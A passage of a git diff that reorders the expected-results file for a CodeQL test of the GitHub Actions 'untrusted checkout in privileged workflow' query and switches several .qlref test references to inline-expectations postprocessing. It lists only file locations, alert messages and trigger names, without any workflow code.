--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -1,3 +1,43 @@ +#select +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | 
@@ -337,43 +377,3 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | -#select -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target |
-| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target |
-| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target |
-| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target |
-| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target |
-| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@).
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target |
-| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@).
| .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target |
-| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run |
-| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@).
| .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run |
-| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target |
-| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@).
| .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target |
-| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
index 9f17733e16e..667c7a78638 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
@@ -1 +1,2 @@
-Security/CWE-829/UntrustedCheckoutCritical.ql
+query: Security/CWE-829/UntrustedCheckoutCritical.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
index 66b3f2cd9bf..84af7bdc723 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
@@ -1 +1,2 @@
-Security/CWE-829/UntrustedCheckoutHigh.ql
+query: Security/CWE-829/UntrustedCheckoutHigh.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
index 55bb194f5ec..1cb2407ccc7 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
@@ -1 +1,2 @@
-Security/CWE-829/UntrustedCheckoutMedium.ql
+query: Security/CWE-829/UntrustedCheckoutMedium.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
index 1887390c0f3..e3d739264b2 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-829/UnversionedImmutableAction.ql
+query: experimental/Security/CWE-829/UnversionedImmutableAction.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
index 6937467453b..849f1cdf8ec 100644
